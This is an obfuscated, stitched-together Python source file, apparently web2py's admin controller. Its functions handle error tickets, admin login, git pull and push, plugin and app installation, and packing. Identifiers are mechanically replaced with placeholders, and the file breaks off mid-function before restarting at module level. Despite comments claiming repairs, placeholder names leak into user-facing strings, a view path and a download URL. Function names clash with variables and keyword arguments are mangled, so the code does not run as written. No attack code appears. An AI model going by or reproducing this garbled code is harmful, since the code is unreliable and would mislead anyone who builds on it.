                        VAR_164[VAR_191]['count'] += 1
                    except KeyError:
                        VAR_218 = VAR_125['traceback'].split("\n")
                        VAR_219 = VAR_218[-2]
                        VAR_220 = os.path.split(VAR_125['layer'])[1]
                        VAR_164[VAR_191] = dict(count=1,
                                                pickel=VAR_125, causer=VAR_220,
                                                VAR_219=VAR_219, VAR_191=VAR_191,
                                                VAR_113=fn.ticket_id)
            except AttributeError as VAR_114:
                VAR_192(VAR_193.id == fn.id).delete()
                VAR_192.commit()
        VAR_165 = [(x['count'], x) for x in VAR_164.values()]
        VAR_165.sort(key=operator.itemgetter(0), reverse=True)
        # was: VAR_3=app, VAR_161=method, VAR_101=db_ready -- undefined names
        return dict(FUNC_42=[x[1] for x in VAR_165], VAR_3=VAR_3,
                    VAR_161=VAR_161, VAR_101=VAR_101)
    elif VAR_161 == 'dbold':
        VAR_192, VAR_193 = FUNC_43(VAR_3)
        for VAR_70 in request.vars:
            if VAR_70[:7] == 'delete_':
                VAR_192(VAR_193.ticket_id == VAR_70[7:]).delete()
                VAR_192.commit()
        VAR_206 = VAR_192(VAR_193.id > 0).select(VAR_193.ticket_id,
                                                 VAR_193.created_datetime,
                                                 orderby=~VAR_193.created_datetime)
        VAR_207 = [row.ticket_id for row in VAR_206]
        VAR_208 = dict([(row.ticket_id, row.created_datetime) for
                        row in VAR_206])
        # was: VAR_207=tickets, VAR_208=times -- undefined names
        return dict(VAR_3=VAR_3, VAR_207=VAR_207, VAR_161=VAR_161,
                    VAR_208=VAR_208, VAR_101=VAR_101)
    else:
        for VAR_70 in request.vars:
            if VAR_70[:7] == 'delete_' and (not VAR_70 == "delete_all}"):
                # 'errors' folder restored for consistency with the branches above
                os.unlink(apath('%s/errors/%s' % (VAR_3, VAR_70[7:]), VAR_122=request))
        VAR_209 = lambda p: os.stat(apath('%s/errors/%s' %
                                          (VAR_3, p), VAR_122=request)).st_mtime
        VAR_207 = sorted(
            listdir(apath('%s/errors/' % VAR_3, VAR_122=request), '^\w.*'),
            key=VAR_209,
            reverse=True)
        return dict(VAR_3=VAR_3, VAR_207=VAR_207, VAR_161=VAR_161, VAR_101=VAR_101)
def FUNC_43(VAR_3):
    """Return (db, ticket_table) for the app's ticket storage.

    Reads the connection string from private/ticket_storage.txt (or uses the
    datastore on GAE); returns False when no DB storage is configured.
    """
    VAR_102 = apath('%s/private' % VAR_3, VAR_122=request)  # '%s' restored
    VAR_103 = os.path.join(VAR_102, 'ticket_storage.txt')
    if os.path.exists(VAR_103):
        VAR_166 = FUNC_3(VAR_103)
        # was: db_string.strip() -- `db_string` was an undefined name
        VAR_166 = VAR_166.strip().replace('\r', '').replace('\n', '')
    elif is_gae:
        VAR_166 = "google:datastore"
    else:
        return False
    VAR_104 = 'web2py_ticket'
    VAR_105 = VAR_104 + '_' + VAR_3
    VAR_106 = apath('%s/databases' % VAR_3, VAR_122=request)
    VAR_107 = DAL(VAR_166, VAR_168=VAR_106, auto_import=True)
    if not VAR_107.get(VAR_105):
        VAR_167 = VAR_107.define_table(
            VAR_105,
            Field('ticket_id', length=100),
            Field('ticket_data', 'text'),
            Field('created_datetime', 'datetime'),
        )
    return VAR_107, VAR_107.get(VAR_105)
def FUNC_44(VAR_15):
    """Turn an absolute path inside the current app into an edit-page link.

    Returns the rendered anchor HTML, or '' when the path is not an
    editable controller/model/view file of the current application.
    """
    VAR_108 = VAR_15.replace('\\', '/')
    if os.path.isabs(VAR_108) and os.path.isfile(VAR_108):
        (VAR_168, VAR_5) = os.path.split(VAR_108)
        (VAR_11, VAR_169) = os.path.splitext(VAR_5)
        VAR_3 = FUNC_5()
        VAR_170 = {'controllers': '.py', 'models': '.py', 'views': '.html'}
        for VAR_143 in VAR_170.keys():
            # '%s' format specs restored (were the broken '%VAR_140')
            VAR_194 = VAR_168.endswith("%s/%s" % (VAR_3, VAR_143))
            if VAR_169.lower() == VAR_170[VAR_143] and VAR_194:
                return to_native(A('"' + VAR_108 + '"',
                                   _href=URL(VAR_122=request,
                                             VAR_221='edit/%s/%s/%s' % (VAR_3, VAR_143, VAR_5))).xml())
    return ''
def FUNC_45(VAR_18):
    """Replace quoted file paths in *VAR_18* with edit links.

    Splits on double quotes; each quoted segment that FUNC_44 recognises
    becomes an anchor, everything else is re-assembled unchanged.
    """
    segments = VAR_18.split('"')
    rebuilt = (len(segments) != 0) and segments[0] or ''
    pos = 1
    while pos < len(segments):
        anchor = FUNC_44(segments[pos])
        if anchor == '':
            # not a linkable path: keep the quote and the raw segment
            rebuilt += '"' + segments[pos]
        else:
            rebuilt += anchor
            if pos + 1 < len(segments):
                rebuilt += segments[pos + 1]
            pos = pos + 1  # the closing-quote segment was consumed too
        pos = pos + 1
    return rebuilt
class CLASS_0(object):
    """Wrap a traceback string so quoted file paths render as edit links."""
    def __init__(self, VAR_112):
        # Highlight the text with CODE(...) then linkify quoted paths.
        self.s = FUNC_45(CODE(VAR_112).xml())
    def FUNC_63(self):
        # Return the rendered HTML string.
        return self.s
def VAR_113():
    """Display an error ticket read from the errors/ folder."""
    if len(request.args) != 2:
        session.flash = T('invalid ticket')
        redirect(URL('site'))
    VAR_3 = FUNC_5()
    VAR_27 = request.env.web2py_version
    VAR_113 = request.args[1]
    VAR_114 = RestrictedError()
    VAR_114.load(request, VAR_3, VAR_113)
    # was: VAR_3=app, VAR_113=FUNC_46, VAR_27=myversion -- undefined names
    return dict(VAR_3=VAR_3,
                VAR_113=VAR_113,
                VAR_67=VAR_114.output,
                VAR_18=(VAR_114.traceback and CLASS_0(VAR_114.traceback)),
                snapshot=VAR_114.snapshot,
                VAR_180=VAR_114.code,
                layer=VAR_114.layer,
                VAR_27=VAR_27)
def FUNC_47():
    """Display an error ticket stored in the ticket database."""
    if len(request.args) != 2:
        session.flash = T('invalid ticket')
        redirect(URL('site'))
    VAR_3 = FUNC_5()
    VAR_27 = request.env.web2py_version
    VAR_113 = request.args[1]
    VAR_114 = RestrictedError()
    request.tickets_db = FUNC_43(VAR_3)[0]
    VAR_114.load(request, VAR_3, VAR_113)
    # NOTE(review): view name below looks garbled by obfuscation -- verify
    # that the 'default/VAR_113.html' template actually exists
    VAR_43.view = 'default/VAR_113.html'
    # was: VAR_3=app, VAR_113=FUNC_46, VAR_27=myversion -- undefined names
    return dict(VAR_3=VAR_3,
                VAR_113=VAR_113,
                VAR_67=VAR_114.output,
                VAR_18=(VAR_114.traceback and CLASS_0(VAR_114.traceback)),
                snapshot=VAR_114.snapshot,
                VAR_180=VAR_114.code,
                layer=VAR_114.layer,
                VAR_27=VAR_27)
def VAR_125():
    """Deliberately raise an exception so admins can test ticket capture."""
    raise RuntimeError('admin VAR_113 generator at your service')
def FUNC_49():
    """Regenerate the app's language translation files, then return to design."""
    VAR_3 = FUNC_5()
    update_all_languages(apath(VAR_3, VAR_122=request))
    session.flash = T('Language VAR_45 (static VAR_71) updated')
    redirect(URL('design', VAR_98=VAR_3, VAR_157='languages'))
def FUNC_50():
    """Auth endpoint: expose login/registration forms in multi-user mode."""
    if MULTI_USER_MODE:
        # The very first registered user is approved automatically.
        if not db(db.auth_user).count():
            auth.settings.registration_requires_approval = False
        return dict(VAR_26=auth())
    else:
        return dict(VAR_26=T("Disabled"))
def FUNC_51():
    """Reload the URL rewrite/routing tables and go back to the site page."""
    gluon.rewrite.load()
    redirect(URL('site'))
def FUNC_52():
    """Manager-only CRUD grid over auth_user for account administration."""
    if not (MULTI_USER_MODE and is_manager()):
        session.flash = T('Not Authorized')
        redirect(URL('site'))
    # Let managers edit the registration key (approval state) in the grid.
    db.auth_user.registration_key.writable = True
    VAR_115 = SQLFORM.grid(db.auth_user)
    return locals()
def FUNC_53():
    """Bulk-register student accounts from a newline-separated email list."""
    if not (MULTI_USER_MODE and is_manager()):
        session.flash = T('Not Authorized')
        redirect(URL('site'))
    VAR_26 = SQLFORM.factory(Field('emails', 'text'))
    if VAR_26.process().accepted:
        VAR_172 = [x.strip() for x in VAR_26.vars.emails.split('\n') if x.strip()]
        VAR_173 = 0
        for email in VAR_172:
            if not db.auth_user(email=email):
                VAR_173 += db.auth_user.insert(email=email) and 1 or 0
        # '%s' restored (was the broken '%VAR_140' format spec)
        session.flash = T('%s students registered', VAR_173)
        redirect(URL('site'))
    return locals()
def FUNC_54():
    """Pull the latest changes for a git-managed application (with confirm)."""
    VAR_3 = FUNC_5()
    if not VAR_19:
        session.flash = VAR_117
        redirect(URL('site'))
    VAR_46 = FORM.confirm(T('Pull'),
                          {T('Cancel'): URL('site')})
    if VAR_46.accepted:
        try:
            VAR_195 = git.Repo(os.path.join(apath(VAR_122=request), VAR_3))
            VAR_196 = VAR_195.remotes.origin
            VAR_196.fetch()
            VAR_196.pull()
            session.flash = T("Application updated via git pull")
            redirect(URL('site'))
        except git.CheckoutError:
            session.flash = T("Pull failed, certain VAR_45 could not be checked VAR_39. Check logs for VAR_178.")
            redirect(URL('site'))
        except git.UnmergedEntriesError:
            session.flash = T("Pull is not possible because you have unmerged VAR_45. Fix them up in the work tree, and then try again.")
            redirect(URL('site'))
        except git.GitCommandError:
            session.flash = T(
                "Pull failed, git exited abnormally. See logs for VAR_178.")
            redirect(URL('site'))
        except AssertionError:
            session.flash = T("Pull is not possible because you have unmerged VAR_45. Fix them up in the work tree, and then try again.")
            redirect(URL('site'))
    elif 'cancel' in request.vars:
        redirect(URL('site'))
    # was: VAR_46=dialog -- `dialog` was an undefined name
    return dict(VAR_3=VAR_3, VAR_46=VAR_46)
def FUNC_55():
    """Commit all app changes and push them to the origin git remote."""
    VAR_3 = FUNC_5()
    if not VAR_19:
        session.flash = VAR_117
        redirect(URL('site'))
    VAR_26 = SQLFORM.factory(Field('changelog', requires=IS_NOT_EMPTY()))
    VAR_26.element('input[type=submit]')['_value'] = T('Push')
    VAR_26.add_button(T('Cancel'), URL('site'))
    VAR_26.process()
    if VAR_26.accepted:
        try:
            VAR_195 = git.Repo(os.path.join(apath(VAR_122=request), VAR_3))
            VAR_197 = VAR_195.index
            VAR_197.add([apath(VAR_122=request) + VAR_3 + '/*'])
            VAR_198 = VAR_197.commit(VAR_26.vars.changelog)
            VAR_196 = VAR_195.remotes.origin
            VAR_196.push()
            session.flash = T(
                "Git VAR_195 updated with latest application changes.")
            redirect(URL('site'))
        except git.UnmergedEntriesError:
            session.flash = T("Push failed, there are unmerged entries in the cache. Resolve merge issues manually and try again.")
            redirect(URL('site'))
    # was: VAR_26=form -- `form` was an undefined name
    return dict(VAR_3=VAR_3, VAR_26=VAR_26)
def VAR_94():
    """Fetch (and cache in the session) the plugin list from web2pyslices."""
    VAR_3 = request.args(0)
    from gluon.serializers import loads_json
    if not session.plugins:
        try:
            VAR_199 = urlopen("http://www.web2pyslices.com/" +
                              "public/api.json/action/list/content/Package?package" +
                              "_type=VAR_96&search_index=false").read()
            session.plugins = loads_json(VAR_199)
        except:
            # best-effort: fall back to an empty list when the site is down
            VAR_43.flash = T('Unable to download the list of plugins')
            session.plugins = []
    return dict(VAR_94=session.plugins["results"], VAR_3=request.args(0))
def FUNC_57():
    """Install a plugin from an http(s) URL after a confirmation form."""
    VAR_3 = request.args(0)
    VAR_116 = request.vars.source
    VAR_96 = request.vars.plugin
    if not (VAR_116 and VAR_3):
        raise HTTP(500, T("Invalid request"))
    # Only http/https sources are allowed (blocks file:// and other schemes).
    if not VAR_116.lower().split('://')[0] in ('http','https'):
        raise HTTP(500, T("Invalid request"))
    VAR_26 = SQLFORM.factory()
    VAR_110 = None
    if VAR_26.process().accepted:
        # '%s' restored (was the broken '%VAR_140' format spec)
        if "web2py.plugin." in VAR_116:
            VAR_5 = "web2py.plugin.%s.w2p" % \
                VAR_116.split("web2py.plugin.")[-1].split(".w2p")[0]
        else:
            VAR_5 = "web2py.plugin.%s.w2p" % cleanpath(VAR_96)
        if plugin_install(VAR_3, urlopen(VAR_116),
                          request, VAR_5):
            session.flash = T('New VAR_96 VAR_212: %s', VAR_5)
        else:
            session.flash = \
                T('unable to install VAR_96 "%s"', VAR_5)
        redirect(URL(VAR_221="plugins", VAR_98=[VAR_3, ]))
    # was: VAR_26=form, VAR_96=FUNC_36, VAR_116=source -- undefined names
    return dict(VAR_26=VAR_26, VAR_3=VAR_3, VAR_96=VAR_96, VAR_116=VAR_116)
|
# ---------------------------------------------------------------------------
# Module-level setup for the admin controller: imports, git availability
# detection and the access guards that run on every request.
# ---------------------------------------------------------------------------
VAR_0 = True
VAR_1 = 1000
if VAR_0:
    if is_mobile:
        VAR_43.view = VAR_43.view.replace('default/', 'default.mobile/')
        VAR_43.menu = []
# The following imports used invalid relative-import syntax ("import .re",
# "from ... import .abspath", ...); restored to valid absolute imports.
import re
from gluon.admin import *
from gluon.fileutils import abspath, read_file, write_file
from gluon.utils import web2py_uuid
from gluon.tools import Config, prevent_open_redirect
from gluon.compileapp import find_exposed_functions
from glob import glob
from gluon._compat import iteritems, PY2, pickle, xrange, urlopen, to_bytes, StringIO, to_native, reload
import gluon.rewrite
import shutil
import platform
try:
    import git
    if git.__version__ < '0.3.1':
        # '%s' restored (was the broken '%VAR_140' format spec)
        raise ImportError("Your VAR_25 of git is %s. Upgrade to 0.3.1 or better." % git.__version__)
    VAR_19 = True
except ImportError as VAR_114:
    VAR_19 = False
    VAR_117 = 'Requires gitpython module, but not VAR_212 or incompatible VAR_25: %s' % VAR_114
from gluon.languages import (read_possible_languages, read_dict, write_dict,
                             read_plural_dict, write_plural_dict)
# Guard destructive endpoints in demo/GAE/multi-user modes.
if DEMO_MODE and request.function in ['change_password', 'pack',
    'pack_custom', 'pack_plugin', 'upgrade_web2py', 'uninstall',
    'cleanup', 'compile_app', 'remove_compiled_app', 'delete',
    'delete_plugin', 'create_file', 'upload_file', 'update_languages',
    'reload_routes', 'git_push', 'git_pull', 'install_plugin']:
    session.flash = T('disabled in demo mode')
    redirect(URL('site'))
if is_gae and request.function in ('edit', 'edit_language',
   'edit_plurals', 'update_languages', 'create_file', 'install_plugin'):
    session.flash = T('disabled in GAE mode')
    redirect(URL('site'))
if not is_manager() and request.function in ['change_password', 'upgrade_web2py']:
    session.flash = T('disabled in multi FUNC_50 mode')
    redirect(URL('site'))
if FILTER_APPS and request.args(0) and not request.args(0) in FILTER_APPS:
    session.flash = T('disabled in demo mode')
    redirect(URL('site'))
# CSRF token used by upload/file endpoints.
if not session.token:
    session.token = web2py_uuid()
def FUNC_0(VAR_2):
    """Count non-blank lines of *VAR_2* that do not start with '#'."""
    total = 0
    for line in VAR_2.split('\n'):
        if line.strip() and not line.startswith('#'):
            total += 1
    return total
def FUNC_1(VAR_3, VAR_4='EDIT', VAR_5=None, VAR_6=0):
    """Append an event to the application's progress.log.

    VAR_4 is the event type (EDIT/DELETE/UPLOAD/...), VAR_5 the file
    involved and VAR_6 the signed line-count delta.  The line format is
    parsed back by FUNC_11.
    """
    VAR_20 = os.path.join(apath(VAR_3, VAR_122=request), 'progress.log')
    VAR_21 = str(request.now)[:19]
    # '%s' restored (the '%VAR_140' specs raised ValueError at runtime)
    if not os.path.exists(VAR_20):
        FUNC_2(VAR_20, 'w').write('[%s] START\n' % VAR_21)
    if VAR_5:
        FUNC_2(VAR_20, 'a').write(
            '[%s] %s %s: %s\n' % (VAR_21, VAR_4, VAR_5, VAR_6))
def FUNC_2(VAR_7, VAR_8):
    """Open a file; in demo/GAE mode, writes go to a no-op sink object."""
    if (DEMO_MODE or is_gae) and ('w' in VAR_8 or 'a' in VAR_8):
        class CLASS_2:
            # Callers use the regular file API (.write()/.close()), so the
            # fake sink must expose those exact names (the obfuscated
            # FUNC_64/FUNC_65 names broke every demo-mode write).
            def write(self, VAR_2):
                pass
            def close(self):
                pass
        return CLASS_2()
    if PY2 or 'b' in VAR_8:
        return open(VAR_7, VAR_8)
    else:
        return open(VAR_7, VAR_8, encoding="utf8")
def FUNC_3(VAR_7, VAR_8='r'):
    """Read and return the entire contents of *VAR_7*, always closing it."""
    handle = FUNC_2(VAR_7, VAR_8)
    try:
        return handle.read()
    finally:
        handle.close()
def FUNC_4(VAR_7, VAR_9, VAR_8='w'):
    """Write *VAR_9* to *VAR_7*, guaranteeing the handle is closed."""
    handle = FUNC_2(VAR_7, VAR_8)
    try:
        handle.write(VAR_9)
    finally:
        handle.close()
def FUNC_5(VAR_10=None):
    """Return the requested app name if it exists and the user may access it.

    Falls back to request.args(0) when VAR_10 is not given; redirects to
    the site page (never returns) on missing app or missing permission.
    """
    VAR_3 = VAR_10 or request.args(0)
    if (VAR_3 and os.path.exists(apath(VAR_3, VAR_122=request)) and
        (not MULTI_USER_MODE or is_manager() or
         db(db.app.name == VAR_3)(db.app.owner == auth.user.id).count())):
        return VAR_3
    session.flash = T('App does not exist or you are not authorized')
    redirect(URL('site'))
def VAR_197():
    """Admin login page: verify the password and redirect to the target.

    The redirect target comes from request.vars.send and is filtered
    through prevent_open_redirect to block open-redirect attacks.
    """
    VAR_23 = prevent_open_redirect(request.vars.send)
    if DEMO_MODE:
        session.authorized = True
        session.last_time = t0
    if not VAR_23:
        # was: send = URL('site') -- assigned to a stray undefined name,
        # leaving VAR_23 empty and the final return referencing `send`
        VAR_23 = URL('site')
    if session.authorized:
        redirect(VAR_23)
    elif failed_login_count() >= allowed_number_of_attempts:
        # throttle brute-force attempts
        time.sleep(2 ** allowed_number_of_attempts)
        raise HTTP(403)
    elif request.vars.password:
        if verify_password(request.vars.password[:1024]):
            session.authorized = True
            login_record(True)
            if CHECK_VERSION:
                session.check_version = True
            else:
                session.check_version = False
            session.last_time = t0
            if isinstance(VAR_23, list):  # ## why does this happen?
                VAR_23 = str(VAR_23[0])
            redirect(VAR_23)
        else:
            VAR_210 = login_record(False)
            if VAR_210 >= allowed_number_of_attempts:
                VAR_43.flash = \
                    T('admin disabled because too many invalid login attempts')
            elif VAR_210 == allowed_number_of_attempts - 1:
                VAR_43.flash = \
                    T('You have one more login attempt before you are locked out')
            else:
                VAR_43.flash = T('invalid password.')
    return dict(VAR_23=VAR_23)
def FUNC_7():
    """Compare the running web2py version against the published one."""
    session.forget()
    session._unlock(VAR_43)
    VAR_24, VAR_25 = check_new_version(request.env.web2py_version,
                                       WEB2PY_VERSION_URL)
    if VAR_24 in (-1, -2):
        # network failure or unparsable answer from the version service
        return A(T('Unable to check for upgrades'), _href=WEB2PY_URL)
    elif not VAR_24:
        return A(T('web2py is up to date'), _href=WEB2PY_URL)
    elif platform.system().lower() in ('windows', 'win32', 'win64') and os.path.exists("web2py.exe"):
        # the Windows binary distribution cannot self-upgrade
        return SPAN('You should upgrade to %s' % VAR_25.split('(')[0])
    else:
        return sp_button(URL('upgrade_web2py'), T('upgrade VAR_21 to %s') % VAR_25.split('(')[0])
def FUNC_8():
    """Log out of the admin session and return to the index page."""
    session.authorized = None
    if MULTI_USER_MODE:
        redirect(URL('user/logout'))
    redirect(URL('index'))
def FUNC_9():
    """Change the admin password (disabled for PAM-authenticated users)."""
    if session.pam_user:
        session.flash = T(
            'PAM authenticated FUNC_50, cannot change password here')
        redirect(URL('site'))
    VAR_26 = SQLFORM.factory(Field('current_admin_password', 'password'),
                             Field('new_admin_password',
                                   'password', requires=IS_STRONG()),
                             Field('new_admin_password_again', 'password'),
                             VAR_144="span4 well")
    if VAR_26.accepts(request.vars):
        if not verify_password(request.vars.current_admin_password):
            VAR_26.errors.current_admin_password = T('invalid password')
        elif VAR_26.vars.new_admin_password != VAR_26.vars.new_admin_password_again:
            VAR_26.errors.new_admin_password_again = T('no match')
        else:
            # '%s' restored (was the broken '%VAR_140' format spec)
            VAR_15 = abspath('parameters_%s.py' % request.env.server_port)
            FUNC_4(VAR_15, 'password="%s"' % CRYPT()(
                request.vars.new_admin_password)[0])
            session.flash = T('password changed')
            redirect(URL('site'))
    # was: VAR_26=form -- `form` was an undefined name
    return dict(VAR_26=VAR_26)
def FUNC_10():
    """Site page: create a new application or upload/clone an existing one."""
    VAR_27 = request.env.web2py_version
    VAR_28 = 'file' in request.vars or 'appurl' in request.vars
    class CLASS_1(object):
        # form validator: app name must be one word and must not clash
        # with an existing application unless overwrite was requested
        def __call__(self, VAR_9):
            if not re.compile('^\w+$').match(VAR_9):
                return (VAR_9, T('Invalid application name'))
            if not request.vars.overwrite and \
                    os.path.exists(os.path.join(apath(VAR_122=request), VAR_9)):
                return (VAR_9, T('Application exists already'))
            return (VAR_9, None)
    VAR_29 = CLASS_1()
    VAR_30 = SQLFORM.factory(Field('name', requires=VAR_29),
                             table_name='appcreate')
    VAR_31 = SQLFORM.factory(Field('name', requires=VAR_29),
                             Field('file', 'upload', uploadfield=False),
                             Field('url'),
                             Field('overwrite', 'boolean'),
                             table_name='appupdate')
    VAR_30.process()
    VAR_31.process()
    if DEMO_MODE:
        pass
    elif VAR_30.accepted:
        VAR_174 = cleanpath(VAR_30.vars.name)
        VAR_175, VAR_125 = app_create(VAR_174, request, info=True)
        if VAR_175:
            if MULTI_USER_MODE:
                db.app.insert(VAR_10=VAR_174, owner=auth.user.id)
            FUNC_1(VAR_174)
            session.flash = T('new application "%s" created', VAR_174)
            gluon.rewrite.load()
            redirect(URL('design', VAR_98=VAR_174))
        else:
            session.flash = \
                DIV(T('unable to create application "%s"', VAR_174),
                    PRE(VAR_125))
        redirect(URL(VAR_122=request))
    elif VAR_31.accepted:
        if (VAR_31.vars.url or '').endswith('.git'):
            if not VAR_19:
                session.flash = VAR_117
                redirect(URL(VAR_122=request))
            VAR_211 = os.path.join(apath(VAR_122=request), VAR_31.vars.name)
            try:
                VAR_217 = git.Repo.clone_from(VAR_31.vars.url, VAR_211)
                session.flash = T('new application "%s" imported',
                                  VAR_31.vars.name)
                gluon.rewrite.load()
            except git.GitCommandError as err:
                session.flash = T('Invalid git repository specified.')
            redirect(URL(VAR_122=request))
        elif VAR_31.vars.url:
            try:
                VAR_221 = urlopen(VAR_31.vars.url)
                if VAR_221.code == 404:
                    raise Exception("404 VAR_16 not found")
            except Exception as VAR_114:
                session.flash = \
                    DIV(T('Unable to download VAR_3 because:'), PRE(repr(VAR_114)))
                redirect(URL(VAR_122=request))
            VAR_120 = VAR_31.vars.url
        elif VAR_31.accepted and VAR_31.vars.file:
            VAR_120 = request.vars.file.filename
            VAR_221 = request.vars.file.file
        else:
            session.flash = 'No VAR_16 uploaded and no URL specified'
            redirect(URL(VAR_122=request))
        if VAR_221:
            VAR_174 = cleanpath(VAR_31.vars.name)
            VAR_212 = app_install(VAR_174, VAR_221,
                                  request, VAR_120,
                                  overwrite=VAR_31.vars.overwrite)
        if VAR_221 and VAR_212:
            # format spec restored (was the invalid '%(VAR_174)VAR_140')
            VAR_155 = 'application %(VAR_174)s VAR_212 with md5sum: %(digest)s'
            if MULTI_USER_MODE:
                db.app.insert(VAR_10=VAR_174, owner=auth.user.id)
            FUNC_1(VAR_174)
            # was: dict(VAR_174=appname, ...) -- undefined name
            session.flash = T(VAR_155, dict(VAR_174=VAR_174,
                                            digest=md5_hash(VAR_212)))
            gluon.rewrite.load()
        else:
            VAR_155 = 'unable to install application "%(VAR_174)s"'
            session.flash = T(VAR_155, dict(VAR_174=VAR_31.vars.name))
        redirect(URL(VAR_122=request))
    VAR_32 = re.compile('^\w+$')
    if is_manager():
        VAR_33 = [VAR_7 for VAR_7 in os.listdir(apath(VAR_122=request)) if VAR_32.match(VAR_7) and
                  VAR_7 != '__pycache__']
    else:
        VAR_33 = [VAR_7.name for VAR_7 in db(db.app.owner == auth.user_id).select()]
    if FILTER_APPS:
        VAR_33 = [VAR_7 for VAR_7 in VAR_33 if VAR_7 in FILTER_APPS]
    # was: sorted(..., VAR_143=lambda VAR_7: a.upper()) -- invalid keyword
    # for the builtin sorted() and `a` was undefined inside the lambda
    VAR_33 = sorted(VAR_33, key=lambda VAR_7: VAR_7.upper())
    VAR_34 = platform.python_version()
    # was: apps/myversion/myplatform/form_create/form_update -- undefined
    return dict(VAR_3=None, VAR_33=VAR_33, VAR_27=VAR_27, VAR_34=VAR_34,
                VAR_30=VAR_30, VAR_31=VAR_31)
def FUNC_11(VAR_3):
    """Parse progress.log and return [day_offset, cumulative_lines] pairs."""
    import datetime  # was "import .datetime" -- invalid relative-import syntax
    VAR_20 = os.path.join(apath(VAR_3, VAR_122=request), 'progress.log')
    # Matches "[<timestamp>] <event> <file>: <signed count>" as written by
    # FUNC_1; '\s'/'\d' escapes restored from the mangled pattern.
    VAR_32 = re.compile('\[(.*?)\][^\:]+\:\s+(\-?\d+)')
    if not os.path.exists(VAR_20):
        return []
    VAR_35 = VAR_32.findall(open(VAR_20, 'r').read())
    VAR_36, VAR_37 = [], 0
    for VAR_156 in VAR_35:
        if not VAR_156:
            continue
        # '%Y-%m-%d %H:%M:%S' restored (directives were mangled)
        VAR_118 = -(request.now - datetime.datetime.strptime(VAR_156[0],
                                                             '%Y-%m-%d %H:%M:%S')).days
        VAR_37 += int(VAR_156[1])
        VAR_36.append([VAR_118, VAR_37])
    return VAR_36
def FUNC_12():
    """Pack an application (optionally compiled) and stream the .w2p file."""
    VAR_3 = FUNC_5()
    try:
        # '%s' restored (the '%VAR_140' specs raised ValueError at runtime)
        if len(request.args) == 1:
            VAR_120 = 'web2py.app.%s.w2p' % VAR_3
            VAR_5 = app_pack(VAR_3, request, raise_ex=True)
        else:
            VAR_120 = 'web2py.app.%s.compiled.w2p' % VAR_3
            VAR_5 = app_pack_compiled(VAR_3, request, raise_ex=True)
    except Exception as VAR_114:
        VAR_176 = VAR_114
        VAR_5 = None
    if VAR_5:
        VAR_43.headers['Content-Type'] = 'application/w2p'
        # Content-Disposition parameter must be named `filename`
        VAR_119 = 'attachment; filename=%s' % VAR_120
        VAR_43.headers['Content-Disposition'] = VAR_119
        return FUNC_3(VAR_5, 'rb')
    else:
        session.flash = T('internal VAR_125: %s', VAR_176)
        redirect(URL('site'))
def FUNC_13():
    """Pack a single plugin into a .w2p file and stream it for download."""
    VAR_3 = FUNC_5()
    if len(request.args) == 2:
        # '%s' restored (was the broken '%VAR_140' format spec)
        VAR_120 = 'web2py.plugin.%s.w2p' % request.args[1]
        VAR_5 = plugin_pack(VAR_3, request.args[1], request)
    if VAR_5:
        VAR_43.headers['Content-Type'] = 'application/w2p'
        # Content-Disposition parameter must be named `filename`
        VAR_119 = 'attachment; filename=%s' % VAR_120
        VAR_43.headers['Content-Disposition'] = VAR_119
        return FUNC_3(VAR_5, 'rb')
    else:
        session.flash = T('internal error')
        redirect(URL('plugin', VAR_98=request.args))
def FUNC_14(VAR_3, VAR_11, VAR_12=None):
    """Bundle selected app files plus a downloaded web2py runtime into a zip.

    VAR_11 is the app folder on disk, VAR_12 the relative file names to
    include.  Returns the zip as a streamed attachment.
    """
    import zipfile  # was "import .zipfile" -- invalid relative-import syntax
    # NOTE(review): the runtime URL below looks garbled by obfuscation --
    # verify the archive name against the live web2py site
    VAR_38 = 'http://www.web2py.com/examples/static/VAR_40.zip'
    VAR_39 = StringIO()
    VAR_39.write(urlopen(VAR_38).read())
    # zipfile.ZipFile's keyword is `mode` (the mangled VAR_4= raised TypeError)
    VAR_40 = zipfile.ZipFile(VAR_39, mode='a')
    VAR_41 = u'# -*- coding: utf-8 -*-\nrouters = dict(BASE=dict(default_application="%s"))' % VAR_3
    # the routing file must be named routes.py for web2py to pick it up
    VAR_40.writestr('web2py/routes.py', VAR_41.encode('utf-8'))
    for VAR_5 in VAR_12:
        VAR_120 = os.path.join(VAR_11, VAR_5)
        VAR_121 = os.path.join('web2py/applications', VAR_3, VAR_5)
        VAR_40.write(VAR_120, VAR_121)
    VAR_40.close()
    VAR_43.headers['Content-Type'] = 'application/zip'
    # '%s' and the `filename` parameter name restored
    VAR_43.headers['Content-Disposition'] = 'attachment; filename=web2py.app.%s.zip' % VAR_3
    VAR_39.seek(0)
    return VAR_43.stream(VAR_39)
def FUNC_15():
    """Custom pack: archive user-selected application files (w2p or zip)."""
    VAR_3 = FUNC_5()
    VAR_11 = apath(VAR_3, VAR_122=request)
    def FUNC_58(VAR_44):
        # drop hidden, backup and editor-temp entries
        return [VAR_221 for VAR_221 in VAR_44 if not (
            VAR_221[:1] in '#' or VAR_221.endswith('~') or VAR_221.endswith('.bak'))]
    VAR_45 = {}
    for (VAR_122, VAR_68, VAR_221) in os.walk(VAR_11):
        VAR_45[VAR_122] = {'folders': FUNC_58(VAR_68), 'files': FUNC_58(VAR_221)}
    if request.post_vars.file:
        # whitelist of real files so only known paths can be packed
        VAR_123 = set(os.path.relpath(os.path.join(VAR_122, VAR_221), VAR_11) for VAR_122 in VAR_45 for VAR_221 in VAR_45[VAR_122]['files'])
        VAR_45 = request.post_vars.file
        # was: [files] -- `files` was an undefined name
        VAR_45 = [VAR_45] if not isinstance(VAR_45, list) else VAR_45
        VAR_45 = [VAR_16 for VAR_16 in VAR_45 if VAR_16 in VAR_123]
    if request.post_vars.doexe is None:
        VAR_120 = 'web2py.app.%s.w2p' % VAR_3  # '%s' restored
        try:
            VAR_5 = app_pack(VAR_3, request, raise_ex=True, VAR_12=VAR_45)
        except Exception as VAR_114:
            VAR_5 = None
        if VAR_5:
            VAR_43.headers['Content-Type'] = 'application/w2p'
            # Content-Disposition parameter must be named `filename`
            VAR_119 = 'attachment; filename=%s' % VAR_120
            VAR_43.headers['Content-Disposition'] = VAR_119
            return FUNC_3(VAR_5, 'rb')
        else:
            session.flash = T('internal VAR_125: %s', VAR_114)
            redirect(URL(VAR_98=request.args))
    else:
        return FUNC_14(VAR_3, VAR_11, VAR_45)
    return locals()
def FUNC_16():
    """Upgrade web2py itself after a confirmation dialog."""
    VAR_46 = FORM.confirm(T('Upgrade'),
                          {T('Cancel'): URL('site')})
    if VAR_46.accepted:
        (VAR_124, VAR_125) = upgrade(request)
        if VAR_124:
            session.flash = T('web2py upgraded; please restart it')
        else:
